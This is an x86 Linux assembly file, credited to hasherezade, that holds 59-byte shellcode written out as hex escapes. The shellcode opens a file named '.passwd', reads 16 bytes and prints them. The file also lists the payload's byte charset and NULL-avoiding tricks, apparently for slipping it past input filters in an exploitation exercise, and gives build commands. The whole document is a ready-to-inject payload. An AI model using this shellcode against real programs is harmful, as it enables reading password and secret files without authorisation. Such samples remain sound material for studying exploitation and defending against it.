read_file.asm

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
; shellcode reading and displaying 0x10 bytes of file: .passwd
; CC-BY: hasherezade
; shellcode (len=59)
; \xb8\x73\x77\x64\x30\xc1\xe0\x08\xc1\xe8\x08\x50\x68\x2e\x70\x61
; \x73\x31\xc0\x31\xc9\x89\xe3\xb0\x05\xcd\x80\x89\xe1\x93\x31\xc0
; \xb0\x03\x31\xd2\xb2\x10\xcd\x80\x89\xc3\x31\xc0\x31\xdb\xb0\x04
; \xfe\xc3\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80
; charset:
; 03 04 05 08 10 2e 30 31 40 50 61 64 68 70 73 77 80 89 93 b0 b2 b8 c0 c1 c3 c9 cd d2 d8 db e0 e1 e3 e8 fe
; compile:
; nasm -f elf32 test1.asm
; ld -m elf_i386 test1.o -o test1
global _start
section .text
_start:
mov eax, 0x30647773 ; file_name (end)
shl eax, 8 ; trick to avoid NULL at the end
shr eax, 8
push eax
push 0x7361702e ; file_name (begining)
xor eax, eax
xor ecx, ecx
open_file:
mov ebx, esp ;file to open (file_name stored on the stack)
mov al, 5 ;open
; ecx = 0 ;read only mode
int 0x80
read:
mov ecx, esp ; store buffer address
xchg ebx, eax ; store fd for read()
xor eax,eax
mov al, 3 ; read() system call
xor edx, edx
mov dl, 0x10 ; buffer size
int 0x80
write:
mov ebx, eax
xor eax, eax
xor ebx, ebx
mov al, 0x4 ; write
inc bl ; descriptor=1 (stdout)
; edx = 0x10 ; buf size
int 0x80
exit:
xor ebx,ebx
mov eax, ebx
inc eax ; 1 -> exit
int 0x80
section .data